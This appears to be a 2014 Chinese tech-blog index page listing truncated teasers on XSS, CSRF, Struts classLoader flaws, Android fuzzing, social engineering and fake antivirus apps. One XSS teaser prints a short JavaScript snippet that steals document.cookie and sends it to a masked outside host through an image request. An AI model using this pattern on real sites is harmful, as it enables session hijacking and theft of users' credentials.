程序员不是有一幅这样的对联吗
上联:一个项目两部电脑三餐盒饭只为四千工资搞得五脏俱损六神无主仍然七点起床八点开会处理九个漏洞十分辛苦;
下联:十年编码九年加班八面无光忙的七窍生烟到头六亲不认五体投地依旧四肢酸软三更加班只为二个臭钱一生孤苦; 横批:苦逼程序员。 其实,程序员职业生涯总结起...
分类:
其他好文 时间:
2014-05-27 01:56:31
阅读次数:
225
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src=’http://www.******.c...
分类:
其他好文 时间:
2014-05-22 08:24:14
阅读次数:
273
社会工程学,和心理学属于一系。俗称社工。社工与特工不同,只是出于分析能力较高。知名度较高的,例如凯文米特尼克。社工需要大量的知识。例如,从一张照片可以得到你所在的位置,拍照的季节和时间等等。有人说社工就是欺骗、欺诈,但我不这样认为。社工主要是与计算机有关。一个社工能力较强的人,根本不需要漏洞或者渗透...
分类:
其他好文 时间:
2014-05-19 19:55:00
阅读次数:
221
目前正在研究android 三方设备驱动 fuzzer , 也就是下图所说的 ioctl
fuzzing, 下图是由keen team nforest 大神发布;欢迎正在研究此方面的人联系我共同交流进步!Email:Blind Fuzz Smart
Fuzzandroid 内核栈溢出android ...
分类:
移动开发 时间:
2014-05-18 19:49:40
阅读次数:
798
Web安全测试之XSSXSS 全称(Cross Site Scripting) 跨站脚本攻击,
是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript),
当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网...
分类:
Web程序 时间:
2014-05-17 20:20:05
阅读次数:
371
CSRF(Cross-site request
forgery),中文名称:跨站请求伪造,也被称为:one click attack/session
riding,缩写为:CSRF/XSRF。一般来说,CSRF是除XSS外最常见一种漏洞,也是一大刷分利器。有关CSRF的具体利用,CEO早在 08年就...
分类:
其他好文 时间:
2014-05-16 04:30:14
阅读次数:
410
这个漏洞是2014年2月4日被发现的, 因为该组件试用范围非常广, 所以该漏洞的影响也非常巨大。通过特制的包含畸形header的http请求,可以导致使用该组件的应用程序进入无线循环从而耗尽CPU等资源并最终崩溃。
最近因为在修补struts1的可操纵classLoader的漏洞(struts2也有该漏洞, 不在本文讨论范围), 所以我就在我建立的struts1的项目上直接做测试。 怎么创建...
分类:
其他好文 时间:
2014-05-15 20:11:19
阅读次数:
240
注:本文仅限技术研究,探讨,测试使用
2014年4月29日爆出的struts的可操纵classLoader的漏洞, 横跨struts1和struts2的所有版本。 影响面和问题的严重性几乎可以和heartbleed相媲美。 struts2要严重一些,对于struts1,只是说在特定条件下可执行特殊操作。
因为项目中用的是struts1,所以主要精力集中在struts1上。既然要修复漏洞...
分类:
其他好文 时间:
2014-05-15 19:52:36
阅读次数:
289
随着App应用呈现出“乱花渐欲迷人眼”的景况,外界对于谷歌和苹果严格审核监管自家应用商店内容的呼声越来越大。4月9日,有消息称,谷歌应用商店再现“造假应用”:一款名为Virus Shield的收费类手机安全助手,实际仅包含几行毫无用处的Java代码。http://www.ijiami.cn/
“造假”应用和垃圾应用已经困扰Android和IOS系统很多年,例如我们所知的Virus Shiel...
分类:
移动开发 时间:
2014-05-15 12:14:00
阅读次数:
482
注入:之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码鸡肋1: 具有破坏性
动作非常大 重新写了配置文件 数据库连接文件鸡肋2: 有一定安全常识的站长都会删掉 install 目录虽然鸡肋 但也有优点 : 不受
magic_quotes_gpc 、 webserver 影响
分类:
Web程序 时间:
2014-05-14 22:39:18
阅读次数:
600
